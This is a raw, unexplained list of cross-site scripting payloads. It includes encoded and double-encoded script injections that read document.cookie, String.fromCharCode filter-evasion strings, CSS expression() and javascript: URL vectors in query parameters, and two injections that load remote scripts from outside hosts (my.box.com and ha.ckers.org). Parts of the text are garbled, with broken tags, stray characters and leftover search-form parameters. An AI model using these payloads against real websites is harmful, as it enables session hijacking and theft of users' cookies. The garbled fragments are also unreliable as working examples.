alert(String.fromCharCode(49))

“> %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “> “>< foo%00 ipt>alert(document.cookie)ipt> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ %253Cscript%253Ealert(0)%253C%252Fscript%253E %3Cscript%3Ealert(0)%3C%2Fscript%3E < %3C %253C > %3E %253E / %2F %252F foo\’; alert(document.cookie);//’;

?image=s%22%20style=x:expression(alert(document.cookie)) ?image=s%22%20style=%22background:url(javascript:alert(‘XSS’)) ?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29 '>

' javascript:alert("hellox worldss")

<"';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//-->"> '>

PT SRC="http://ha.ckers.org/xss.js"> < <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search

hellox worldss

...